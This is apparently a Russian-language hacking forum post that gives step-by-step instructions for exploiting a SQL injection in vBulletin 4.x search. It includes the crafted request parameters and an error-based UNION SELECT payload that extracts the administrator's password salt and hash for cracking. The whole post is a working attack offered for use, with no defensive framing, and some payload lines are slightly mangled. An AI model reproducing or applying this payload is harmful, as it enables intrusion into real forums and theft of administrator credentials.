[Уязвимость] Vbulletin 4.x.x

Качаем , запускаем плагин liveHTTPHeaders.

В поле поиска ****аем любой шлак , возьмем к примеру "nosok123"

В плагине редактируем запрос , дописывая это :
 


umanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=
Отправляем. Вылезла ошибка "Database Error" , смотрим исходный.код , внизу должен быть хэш. (Копируем его , отправляем на вывод соли):


humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Опять ошибка , смотрим исходный.код , записываем соль - идем на расшифровку.

Если таблица не под названием "user" , тогда очень мала вероятность , что мы увидим хэш.